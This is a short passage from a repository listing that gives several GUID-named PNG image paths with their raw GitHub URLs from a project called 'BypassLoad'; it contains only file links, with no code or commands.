https://raw.githubusercontent.com/Mangofang/BypassLoad/5a23d895b651088ce846df0aabe72acffe6553ab/image/{4CC0F1A0-4C88-41d0-BA49-9ACAD8486F8C}.png
--------------------------------------------------------------------------------
/image/{AB76D9F0-6FF6-424c-BA8C-5AC09209FF61}.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mangofang/BypassLoad/5a23d895b651088ce846df0aabe72acffe6553ab/image/{AB76D9F0-6FF6-424c-BA8C-5AC09209FF61}.png
--------------------------------------------------------------------------------
/image/{CB42B60F-F029-46d4-ADF7-B80263FF72B8}.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mangofang/BypassLoad/5a23d895b651088ce846df0aabe72acffe6553ab/image/{CB42B60F-F029-46d4-ADF7-B80263FF72B8}.png
--------------------------------------------------------------------------------
/image/{CFE2B5D0-BF30-4063-9ADC-6426314F6132}.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mangofang/BypassLoad/5a23d895b651088ce846df0aabe72acffe6553ab/image/{CFE2B5D0-BF30-4063-9ADC-6426314F6132}.png
--------------------------------------------------------------------------------